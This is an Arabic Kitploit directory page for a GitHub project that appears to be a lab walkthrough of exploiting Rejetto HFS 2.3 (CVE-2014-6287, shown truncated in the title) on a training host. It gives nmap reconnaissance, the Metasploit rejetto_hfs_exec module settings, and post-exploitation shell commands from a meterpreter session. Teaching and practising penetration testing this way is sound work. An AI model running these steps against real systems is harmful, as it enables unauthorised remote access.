Skip to content
KitploitKITPLOIT
أدواتعمليات الاستغلالالمدونة
Log in
إرسال
أدواتعمليات الاستغلالالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
HFS_EXPLOIT_PROJECT — Metasploit RCE على HFS 2.3 - CVE-2014-62 | Kitploit
أدوات/GitHubGitHub/sage954526/hfs_exploit_project
أطر الاستغلالتحليل الثغرات الأمنيةاستغلال تطبيقات الويباختبار الاختراقالتعلم والتعليمأداة الوصول عن بعد
GitHubsage954526/hfs_exploit_project

HFS_EXPLOIT_PROJECT

Metasploit RCE على HFS 2.3 - CVE-2014-62

عرض المستودع
11منذ سنة واحدةلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

HFS_EXPLOIT_PROJECT

Metasploit RCE على HFS 2.3 - CVE-2014-62

🔖 عنوان المشروع

> تنفيذ التعليمات البرمجية عن بُعد عبر خادم ملفات HTTP (HFS 2.3)

⚙ الأدوات المستخدمة • Kali Linux • Nmap • Metasploit • الهدف: HFS 2.3 على Windows 7

🔐 تفاصيل الثغرة • الاسم: CVE-2014-6287 • النوع: تنفيذ التعليمات البرمجية عن بُعد • السبب: إدخال غير مُتحقق منه في برمجة HFS • الأثر: الوصول إلى شل بدون مصادقة

🔍 المنهجية (خطوة بخطوة)

🔹 الخطوة 1: جمع المعلومات (Nmap)

•    nmap -sV demo.ine.local (عنوان الهدف) 
•    تم العثور على منفذ مفتوح: 80
•    الخدمة: rejetto HTTP file server 2.3

فحص Nmap

Nmap

🔹 الخطوة 2: الاستغلال (Metasploit)

• Msfconsole
• ابحث عن HFS أو rejetto
• use exploit/windows/http/rejetto_hfs_exec
• set RHOST 192.168.1.100
• set RPORT 80
• set LHOST 192.168.1.101
• run

إعداد الاستغلال

Exploit Exploit

🔹 الخطوة 3: ما بعد الاستغلال

بعد التشغيل ستحصل على جلسة meterpreter استخدم الأمر: shell

• whoami • ipconfig • dir

الوصول إلى الشل

Shell

Shell

تنزيل الأداة